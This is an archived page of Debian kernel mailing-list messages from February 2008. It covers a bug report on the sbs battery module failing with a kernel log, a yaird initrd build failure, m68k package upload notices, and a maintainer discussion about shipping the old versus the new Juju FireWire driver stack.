with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465461: linux-image-2.6.24-1-686: modprobe sbs fails with Unknown parameter `update_time'

2008-02-12 Thread Libor Klepac
Package: linux-image-2.6.24-1-686
Version: 2.6.24-4
Severity: normal

Hello,
since upgrading from 2.6.23-2 to 2.6.24-3 and 2.6.24-4, module sbs
(smart battery system) doesn't load with message
sbs: Unknown parameter `update_time'

My notebook (acer travelmate 4501WLMi) provides battery status only with this 
module, so without
it, it doesn't react on low battery status (it died yesterday with flat
battery)


CU
Libor



-- Package-specific info:
** Kernel log:
Yenta: Using CSCINT to route CSC interrupts to PCI
Yenta: Routing CardBus interrupts to PCI
Yenta TI: socket :02:06.0, mfunc 0x01a21b22, devctl 0x64
Yenta: ISA IRQ mask 0x08b8, PCI irq 10
Socket status: 3006
Yenta: Raising subordinate bus# of parent bus (#02) from #02 to #06
pcmcia: parent PCI bridge I/O window: 0x4000 - 0x4fff
cs: IO port probe 0x4000-0x4fff: clean.
pcmcia: parent PCI bridge Memory window: 0xd020 - 0xd05f
fuse init (API version 7.9)
Ebtables v2.0 registered
Bridge firewalling registered
Synaptics Touchpad, model: 1, fw: 5.9, id: 0x126eb1, caps: 0xa04713/0x4000
input: SynPS/2 Synaptics TouchPad as /class/input/input1
RPC: Registered udp transport module.
RPC: Registered tcp transport module.
NET: Registered protocol family 10
lo: Disabled Privacy Extensions
usbcore: registered new interface driver usblp
input: Power Button (FF) as /class/input/input2
ACPI: Power Button (FF) [PWRF]
input: Lid Switch as /class/input/input3
ACPI: Lid Switch [LID]
input: Sleep Button (CM) as /class/input/input4
ACPI: Sleep Button (CM) [SLPB]
sbs: Unknown parameter `update_time'
parport_pc 00:08: reported by Plug and Play ACPI
parport0: PC-style at 0x378 (0x778), irq 7, dma 3 
[PCSPP,TRISTATE,COMPAT,EPP,ECP,DMA]
lp0: using parport0 (interrupt-driven).
ppdev: user-space parallel port driver
irda_init()
NET: Registered protocol family 23
nsc_ircc_pnp_probe() : From PnP, found firbase 0x2F8 ; irq 3 ; dma 1.
nsc-ircc, chip-init
nsc-ircc, Found chip at base=0x164e
nsc-ircc, driver loaded (Dag Brattli)
IrDA: Registered device irda0
nsc-ircc, Using dongle: IBM31T1100 or Temic TFDS6000/TFDS6500
irlap_change_speed(), setting speed to 9600
Installing knfsd (copyright (C) 1996 [EMAIL PROTECTED]).
NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
NFSD: starting 90-second grace period
Bluetooth: Core ver 2.11
NET: Registered protocol family 31
Bluetooth: HCI device and connection manager initialized
Bluetooth: HCI socket layer initialized
Bluetooth: L2CAP ver 2.9
Bluetooth: L2CAP socket layer initialized
Bluetooth: RFCOMM socket layer initialized
Bluetooth: RFCOMM TTY layer initialized
Bluetooth: RFCOMM ver 1.8
ADDRCONF(NETDEV_UP): eth0: link is not ready
Netfilter messages via NETLINK v0.30.
ip_tables: (C) 2000-2006 Netfilter Core Team
Linux agpgart interface v0.102
[drm] Initialized drm 1.1.0 20060810
[drm] Initialized radeon 1.28.0 20060524 on minor 0
cs: IO port probe 0x100-0x3af: clean.
cs: IO port probe 0x3e0-0x4ff: clean.
cs: IO port probe 0x820-0x8ff: clean.
cs: IO port probe 0xc00-0xcf7: clean.
cs: IO port probe 0xa00-0xaff: clean.
agpgart: Detected an Intel 855GM Chipset.
agpgart: AGP aperture is 256M @ 0xe000
pci_hotplug: PCI Hot Plug PCI Core version: 0.5
shpchp: Standard Hot Plug PCI Controller Driver version: 0.4
input: Video Bus as /class/input/input5
ACPI: Video Device [VGA] (multi-head: yes  rom: no  post: no)
sbs: Unknown parameter `update_time'
iTCO_wdt: Intel TCO WatchDog Timer Driver v1.02 (26-Jul-2007)
iTCO_wdt: Found a ICH4-M TCO device (Version=1, TCOBASE=0x1060)
iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0)
intel_rng: FWH not detected
ACPI: PCI Interrupt :00:1f.3[B] - Link [LNKB] - GSI 10 (level, low) - 
IRQ 10
Real Time Clock Driver v1.12ac
ieee80211_crypt: registered algorithm 'NULL'
ieee80211: 802.11 data/management/control stack, git-1.1.13
ieee80211: Copyright (C) 2004-2005 Intel Corporation [EMAIL PROTECTED]
ACPI: PCI Interrupt :02:06.3[A] - Link [LNKE] - GSI 10 (level, low) - 
IRQ 10
ipw2200: Intel(R) PRO/Wireless 2200/2915 Network Driver, 1.2.2kmprq
ipw2200: Copyright(c) 2003-2006 Intel Corporation
ACPI: PCI Interrupt :02:04.0[A] - Link [LNKB] - GSI 10 (level, low) - 
IRQ 10
ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection
ipw2200: Detected geography ZZM (11 802.11bg channels, 0 802.11a channels)
udev: renamed network interface eth1 to eth2
ACPI: PCI Interrupt :00:1f.6[B] - Link [LNKB] - GSI 10 (level, low) - 
IRQ 10
PCI: Setting latency timer of device :00:1f.6 to 64
MC'97 0 converters and GPIO not ready (0x1)
ACPI: PCI Interrupt :00:1f.5[B] - Link [LNKB] - GSI 10 (level, low) - 
IRQ 10
PCI: Setting latency timer of device :00:1f.5 to 64
intel8x0_measure_ac97_clock: measured 55896 usecs
intel8x0: clocking to 48000
mtrr: no MTRR for d800,400 found
ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready
ieee80211_crypt: registered algorithm 'TKIP'
eth2: no IPv6 routers present
tun: Universal TUN/TAP device driver, 1.6
tun: (C) 1999-2004 Max 

Bug#375277: double console messages about card reader

2008-02-12 Thread maximilian attems
On Tue, 12 Feb 2008, [EMAIL PROTECTED] wrote:

 OK but
 Preparing to replace linux-image-2.6.24-1-686 2.6.24-2 (using 
 .../linux-image-2.6.24-1-686_2.6.24-4_i386.deb) ...
 The directory /lib/modules/2.6.24-1-686 still exists. Continuing as directed.
 Done.
 Unpacking replacement linux-image-2.6.24-1-686 ...
 Setting up linux-image-2.6.24-1-686 (2.6.24-4) ...
 Running depmod.
 Finding valid ramdisk creators.
 Using mkinitrd.yaird to build the ramdisk.
 yaird error: unrecognised device: /sys/devices/LNXSYSTM:00
 yaird error: unrecognised device: /sys/devices/LNXSYSTM:00/device:00
 yaird error: unrecognised device: 
 /sys/devices/LNXSYSTM:00/device:00/PNP0A03:00
 yaird error: unrecognised device: 
 /sys/devices/LNXSYSTM:00/device:00/PNP0A03:00/LNXVIDEO:00
 yaird error: there were errors in this run, aborting now without output 
 (fatal)
 mkinitrd.yaird failed to create initrd image.
 Failed to create initrd image.
 dpkg: error processing linux-image-2.6.24-1-686 (--configure):
  subprocess post-installation script returned error exit status 9
 Errors were encountered while processing:
  linux-image-2.6.24-1-686
 E: Sub-process /usr/bin/dpkg returned an error code (1)

yep yaird didn't learn yet to transform those errors in warnings,
real pain, runs fine with initramfs-tools.
thanks for the report on yaird.
-- 
maks



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processing of linux-2.6_2.6.24-4_m68k.changes

2008-02-12 Thread Archive Administrator
linux-2.6_2.6.24-4_m68k.changes uploaded successfully to localhost
along with the files:
  linux-image-2.6.24-1-amiga_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-amiga_2.6.24-4_m68k.deb
  linux-image-2.6.24-1-atari_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-atari_2.6.24-4_m68k.deb
  linux-image-2.6.24-1-bvme6000_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-bvme6000_2.6.24-4_m68k.deb
  linux-image-2.6.24-1-mac_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-mac_2.6.24-4_m68k.deb
  linux-image-2.6.24-1-mvme147_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-mvme147_2.6.24-4_m68k.deb
  linux-image-2.6.24-1-mvme16x_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-mvme16x_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-common_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-all_2.6.24-4_m68k.deb
  linux-headers-2.6.24-1-all-m68k_2.6.24-4_m68k.deb
  linux-libc-dev_2.6.24-4_m68k.deb

Greetings,

Your Debian queue daemon


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



linux-2.6_2.6.24-4_m68k.changes ACCEPTED

2008-02-12 Thread Debian Installer

Accepted:
linux-headers-2.6.24-1-all-m68k_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-all-m68k_2.6.24-4_m68k.deb
linux-headers-2.6.24-1-all_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-all_2.6.24-4_m68k.deb
linux-headers-2.6.24-1-amiga_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-amiga_2.6.24-4_m68k.deb
linux-headers-2.6.24-1-atari_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-atari_2.6.24-4_m68k.deb
linux-headers-2.6.24-1-bvme6000_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-bvme6000_2.6.24-4_m68k.deb
linux-headers-2.6.24-1-common_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-common_2.6.24-4_m68k.deb
linux-headers-2.6.24-1-mac_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-mac_2.6.24-4_m68k.deb
linux-headers-2.6.24-1-mvme147_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-mvme147_2.6.24-4_m68k.deb
linux-headers-2.6.24-1-mvme16x_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-mvme16x_2.6.24-4_m68k.deb
linux-image-2.6.24-1-amiga_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-amiga_2.6.24-4_m68k.deb
linux-image-2.6.24-1-atari_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-atari_2.6.24-4_m68k.deb
linux-image-2.6.24-1-bvme6000_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-bvme6000_2.6.24-4_m68k.deb
linux-image-2.6.24-1-mac_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-mac_2.6.24-4_m68k.deb
linux-image-2.6.24-1-mvme147_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-mvme147_2.6.24-4_m68k.deb
linux-image-2.6.24-1-mvme16x_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-mvme16x_2.6.24-4_m68k.deb
linux-libc-dev_2.6.24-4_m68k.deb
  to pool/main/l/linux-2.6/linux-libc-dev_2.6.24-4_m68k.deb


Override entries for your package:
linux-headers-2.6.24-1-all-m68k_2.6.24-4_m68k.deb - optional devel
linux-headers-2.6.24-1-all_2.6.24-4_m68k.deb - optional devel
linux-headers-2.6.24-1-amiga_2.6.24-4_m68k.deb - optional devel
linux-headers-2.6.24-1-atari_2.6.24-4_m68k.deb - optional devel
linux-headers-2.6.24-1-bvme6000_2.6.24-4_m68k.deb - optional devel
linux-headers-2.6.24-1-common_2.6.24-4_m68k.deb - optional devel
linux-headers-2.6.24-1-mac_2.6.24-4_m68k.deb - optional devel
linux-headers-2.6.24-1-mvme147_2.6.24-4_m68k.deb - optional devel
linux-headers-2.6.24-1-mvme16x_2.6.24-4_m68k.deb - optional devel
linux-image-2.6.24-1-amiga_2.6.24-4_m68k.deb - optional admin
linux-image-2.6.24-1-atari_2.6.24-4_m68k.deb - optional admin
linux-image-2.6.24-1-bvme6000_2.6.24-4_m68k.deb - optional admin
linux-image-2.6.24-1-mac_2.6.24-4_m68k.deb - optional admin
linux-image-2.6.24-1-mvme147_2.6.24-4_m68k.deb - optional admin
linux-image-2.6.24-1-mvme16x_2.6.24-4_m68k.deb - optional admin
linux-libc-dev_2.6.24-4_m68k.deb - optional devel



Thank you for your contribution to Debian.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#436267: Firewire support in lenny

2008-02-12 Thread Guus Sliepen
On Tue, Feb 12, 2008 at 11:49:22AM +0100, maximilian attems wrote:

  I guess that means that lenny will be released with linux kernel
  2.6.24.x. If that is so, then I kindly request that the debian kernel
  packages will be released with the stable Firewire stack modules
  compiled.
 
 no certainly not, we haven't yet discussed the release kernel.
 options are 2.6.25 or 2.6.26.

Given the pace of kernel releases, I do not believe 2.6.26 is possible
for lenny, but 2.6.25 is possible, although I think it will only be
released a month or two before the final freeze.

   Regarding Linux 2.6.22...2.6.24, the best advice to Linux distributors
   (kernel packagers) as well as to regular users is: Build only the old
   IEEE 1394 drivers.
 
 you omit the interesting next paragraph:
 Building the new drivers is only for advanced users (who for example
 want the better speed of firewire-sbp2 relative to sbp2) - and for
 distributors who know what is required in userspace to make use of the
 new drivers and who can get bugfixes backported and rolled out quickly.
 
 on the kernel side we do backport firewire patches.
 for the userspace side i still see lack of action on libdc1394
 2008/01/05: The official version 2.0.0 has been released.
 2008/01/05: A first set of fixes have been released (version 2.0.1)
 
 why is that not even in unstable/experimental?

libdc1394 2.0.1 is in unstable: http://packages.debian.org/libdc1394-22

My IIDC cameras do not work correctly with a juju-enabled libdc1394
2.0.1. Furthermore, apart from coriander there are no applications that
have migrated from libdc1394 v1 to v2.

 the progress of the juju stack is very nice, there are quite some
 fixes queued for 2.6.25, we will make those snapshots available
 soonest.

That is good to hear.

 if the regression list for 2.6.25 is still high we may reconsider
 there to build the old stack with blacklisted modules.
 that has always been our stated fallback position, currently in the
 development phase we encourage testing of the newer stack
 on latest linux-images.

I do not see why making the old stack available again, but blacklisted
by default, discourages testing of the newer stack. If you have both
available, then yes, users can switch to the new stack more easily, but
at least they will still be using Debian kernel packages, and they can
switch back to the juju stack just as well. If you do not make this
option available, those who have problems with the new stack will have
to compile their own kernels, and then they will not track the Debian
kernel packages anymore.

-- 
Met vriendelijke groet / with kind regards,
  Guus Sliepen [EMAIL PROTECTED]


signature.asc
Description: Digital signature


Bug#436267: Firewire support in lenny

2008-02-12 Thread Guus Sliepen
On Sun, Feb 03, 2008 at 10:04:18AM +0100, Marc 'HE' Brockschmidt wrote:

 Early March 2008
   Very soft freeze
[...]
 Mid of July 2008
   Full freeze

I guess that means that lenny will be released with linux kernel
2.6.24.x. If that is so, then I kindly request that the debian kernel
packages will be released with the stable Firewire stack modules
compiled.

The current kernel package mainainer(s) has (have) decided to disable
the stable modules in favour of the new and experimental JuJu stack[0].
The new stack has the advantage that is more secure and has a cleaner
code base, but the drawback that a lot of devices and features are not
yet supported. To summarise what the JuJu developers themselves say
about the current state of the new stack[1]:

 Compatibility and stability
 
 At the time of this writing (01/2008), there are still multiple problems
 with the new FireWire kernel driver stack (alias Juju) compared to the
 old stack:
 
  * Lacking userspace integration.
  * Lack of testing. Therefore compatibility issues with some controllers and
external devices.
  * There are still problems with isochronous reception on some OHCI 1.0
variants of VIA VT6306/6307 based cards. Cameras and audio devices are
unusable with the new drivers if you have such a chip.
  * Almost no support for IIDC cameras: Highly experimental support in libdc1394
v2 which works with some luck on only a few OHCI 1.1 controllers.
  * Stability issues of the storage device driver firewire-sbp2 on some
hardware.
  * Missing IP over 1394 support. 
 
 Regarding Linux 2.6.22...2.6.24, the best advice to Linux distributors
 (kernel packagers) as well as to regular users is: Build only the old
 IEEE 1394 drivers.

There are security issues with the stable stack[2], so to protect our
users it is better to load the modules for the JuJu stack by default.
But for those people who need the stable stack to do work, the modules
for the stable stack should be available. There is no reason not to
build both stacks, they don't conflict with each other (except that only
one works if you load both, of course).

I hope the kernel package maintainer(s) will make sure kernel packages
with the stable modules available, but blacklisted by default, will
enter testing soon, so that users of testing get a chance to test it
before lenny is released.


[0] http://bugs.debian.org/436267
[1] http://wiki.linux1394.org/JujuMigration
[2] http://en.wikipedia.org/wiki/FireWire#Security_issues
 
-- 
Met vriendelijke groet / with kind regards,
  Guus Sliepen [EMAIL PROTECTED]


signature.asc
Description: Digital signature


Bug#436267: Firewire support in lenny

2008-02-12 Thread maximilian attems
[ stripping cc list to relevant bug report + devel for general info ]

On Tue, Feb 12, 2008 at 12:31:43PM +0100, Guus Sliepen wrote:
 On Tue, Feb 12, 2008 at 11:49:22AM +0100, maximilian attems wrote:
 
 Given the pace of kernel releases, I do not believe 2.6.26 is possible
 for lenny, but 2.6.25 is possible, although I think it will only be
 released a month or two before the final freeze.

that discussion belongs to another thread, but don't be too pessimistic.
 
[snipp]
 libdc1394 2.0.1 is in unstable: http://packages.debian.org/libdc1394-22

cool.
sorry rmadison wasn't showing it to me yet.
 
 My IIDC cameras do not work correctly with a juju-enabled libdc1394
 2.0.1. Furthermore, apart from coriander there are no applications that
 have migrated from libdc1394 v1 to v2.

even with 2.6.24-4 linux images?
please mention the uname of your tests
 
  the progress of the juju stack is very nice, there are quite some
  fixes queued for 2.6.25, we will make those snapshots available
  soonest.
 
 That is good to hear.

if you are on amd64 2.6.25-rc1-git2
- http://photon.itp.tuwien.ac.at/~mattems/
will build i686 during day (takes much longer)

please if 2.6.24 has troubles feedback on that one.
 
  if the regression list for 2.6.25 is still high we may reconsider
  there to build the old stack with blacklisted modules.
  that has always been our stated fallback position, currently in the
  development phase we encourage testing of the newer stack
  on latest linux-images.
 
 I do not see why making the old stack available again, but blacklisted
 by default, discourages testing of the newer stack. If you have both
 available, then yes, users can switch to the new stack more easily, but
 at least they will still be using Debian kernel packages, and they can
 switch back to the juju stack just as well. If you do not make this
 option available, those who have problems with the new stack will have
 to compile their own kernels, and then they will not track the Debian
 kernel packages anymore.

you can't have both without blacklisting one otherwise udev loads
randomly from boot to boot other firewire stack. changing blacklist
files in /etc/modprobe.d is trivial.
 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]